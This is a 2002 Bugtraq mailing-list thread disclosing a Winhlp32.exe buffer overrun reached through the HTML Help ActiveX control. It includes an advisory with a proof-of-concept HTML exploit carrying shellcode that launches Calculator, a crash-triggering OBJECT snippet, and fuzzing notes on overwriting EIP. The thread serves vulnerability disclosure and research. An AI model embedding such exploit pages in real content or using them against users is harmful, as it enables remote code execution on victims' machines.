Bugtraq mailing list archives
RE: Winhelp32 Remote Buffer Overrun
From: "Drew" <dcopley () eeye com>
Date: Tue, 6 Aug 2002 19:30:32 -0700
Running this on my local file fuzzer, Litchfield's begins to hit exceptions at 200 increments. (At a blank value it gives a memory error). At 216 increments (and at least for awhile, above) it overwrites EIP with 41414141. (Windows 2000 Service Pack 2). Testing Jelmer's as it was written below I ran to 10,000 increments and did not find an issue. Testing to 10,000 with .TIF as the extension did not find an issue. Testing these same case tests with using the method HHClick() as in Litchfield's does not give an issue. It may have been with another method, or perhaps some interaction with the webpage. It may be the characters used to bruteforce it. Perhaps, they were unicode (which I could test, as well as anything else).
-----Original Message----- From: Mark Litchfield [mailto:mark () ngssoftware com] Sent: Tuesday, August 06, 2002 12:24 PM To: Jelmer; bugtraq () securityfocus com Subject: Re: Winhelp32 Remote Buffer Overrun If I am not mistaken, I believe that Microsoft are aware of this issue and have an IE patch comming out very shortly. My brother reported this to them, please see http://www.nextgenss.com/vna/ms-whelp.txt Regards Cheers, Mark Litchfield ----- Original Message ----- From: "Jelmer" <jelmer () kuperus xs4all nl> To: "Next Generation Insight Security Research Team" <mark () ngssoftware com>; <bugtraq () securityfocus com>; <ntbugtraq () listser ntbugtraq com> Sent: Thursday, August 01, 2002 5:19 PM Subject: Re: Winhelp32 Remote Buffer OverrunI just installed servicepack 3 and the following code stillcrashed mymy IE6 with a memory could not be refferenced error. <OBJECT ID=hhctrl TYPE="application/x-oleobject" CLASSID="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"> <PARAM name="Command" value="Shortcut"> <PARAM name="Button" value="Bitmap:shortcut"> <PARAM name="Item1" value=",,"> <PARAM name="Item2" value="273,1,1"> <PARAM name="codebase" value=""> <PARAM name="Font" value=" A VERY VERY LONG STRING "> </OBJECT> I have been told this means it is most likely exploitable. I am not into buffer overflows myself though, maybe someone canconfirm this.Anyways I notified microsoft of this several months ago.The day afterI notifiedthemsomeone pointed me to the ngssoftware advisory *sob*, and Inotifiedmicrosoft that this was probably the same issue, last I heard from themtheywhere looking in to if this was indeed the case. It's been several months and as far as I know they are still looking. -- jelmer ----- Original Message ----- From: "Next Generation Insight Security Research Team" <mark () ngssoftware com> To: <bugtraq () securityfocus com>; <ntbugtraq () listser ntbugtraq com> Sent: Friday, August 02, 2002 3:59 AM Subject: Winhelp32 Remote Buffer Overrun-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 NGSSoftware Insight Security Research Advisory Name: Winhlp32.exe Remote BufferOverrun Systems Affected: Win2K Platform Severity: Critical Category: Remote Buffer Overrun Vendor URL: http://www.mircosoft.com Author: Mark Litchfield (mark () ngssoftware com) Date: 1st August 2002 Advisory number: #NISR01082002 Description *********** Many of the features available in HTML Help areimplemented throughthe HTML Help ActiveX control (HHCtrl.ocx). The HTML Help ActiveX control is used to provide navigation features (such as atable ofcontents), to display secondary windows and pop-updefinitions, andto provide other features. The HTML Help ActiveX controlcan be usedfrom topics in a compiled Help system as well as from HTML pages displayed in a Web browser. The functionality provided bythe HTMLHelp ActiveX control will run in the HTML Help Viewer or in any browser that supports ActiveX technology, such asInternet Explorer(version 3.01 or later). Some features, as with theWinHlp Command,provided by the HTML Help ActiveX control are meant to beavailableonly when it is used from a compiled HTML Help file(.chm) that isdisplayed by using the HTML Help Viewer. Details ******* Winhlp32.exe is vulnerable to a bufferoverrun attackusing the Itemparameter within WinHlp Command, the item parameter is used to specify the file path of the WinHelp (.hlp) file in which the WinHelp topic is stored, and the window name of thetarget window.Using this overrun, an attacker can successfully exectutearbitarycode on a remote system by either encouraging the victimto visit aparticular web page, whereby code would executeautomatically, or byincluding the exploit within the source of an email. Inregards toemail, execution would automatically occur when the mailappears inthe preview pane and ActiveX objects are allowed (This isallowed bydefault, the Internet Security Settings would have to beset as HIGHto prevent execution of this vulnerability). Any exploit would execute in the context of the logged on user. Visual POC Exploit ****************** This POC will simply display Calculator. Please note that this written on a Win2k PC with SP2 installed. I have nottested it onanything else. <OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp type=application/x-oleobject width=0><PARAM NAME="Width" VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command" VALUE="WinHelp"><PARAM NAME="Item1"VALUE="3ÀPhcalc4$ƒÀPV¸¯§éwÿÐ3ÀP¾”éwÿÖAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTAAAA©õwABCDEFGHƒÆÿægMyWindow"><PARAMNAME="Item2" VALUE="NGS Software LTD"></OBJECT> <SCRIPT>winhelp.HHClick()</SCRIPT> Fix Information *************** NGSSoftware alerted Microsoft to these problems on the 6th March 2002. NGSSoftware highly recommend installing MicrosoftWindows SP3,as the fix has been built into this service pack found at http://www.microsoft.com An alternative to these patcheswould be toensure the security settings found in the InternetOptions is set tohigh. Despite the Medium setting, stating that unsigned ActiveX controls will not be downloaded, Kylie will still executeCalc.exe.Another alternative would be to remove winhlp32.exe if it is not required within your environment. A check for these issues has been added to Typhon II, ofwhich moreinformation is available from the NGSSoftware website, http://www.ngssoftware.com. Further Information ******************* For further information about the scope and effects of buffer overflows, please see http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf http://www.ngssoftware.com/papers/ntbufferoverflow.html http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf http://www.ngssoftware.com/papers/unicodebo.pdf -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com> iQA/AwUBPUnnf8a1CFAff8bXEQLz8gCgm4lbs5Fs2WUH5Au2cAkG0JQKKLMAn13p a+qSkYWrz7uspZcqqRTc2r0C =2PKN -----END PGP SIGNATURE-----
Current thread:
- Winhelp32 Remote Buffer Overrun Next Generation Insight Security Research Team (Aug 01)
- Re: Winhelp32 Remote Buffer Overrun Jelmer (Aug 01)
- Re: Winhelp32 Remote Buffer Overrun Mark Litchfield (Aug 06)
- RE: Winhelp32 Remote Buffer Overrun Drew (Aug 10)
- Re: Winhelp32 Remote Buffer Overrun Mark Litchfield (Aug 06)
- <Possible follow-ups>
- RE: Winhelp32 Remote Buffer Overrun Drew (Aug 10)
- Re: Winhelp32 Remote Buffer Overrun Jelmer (Aug 01)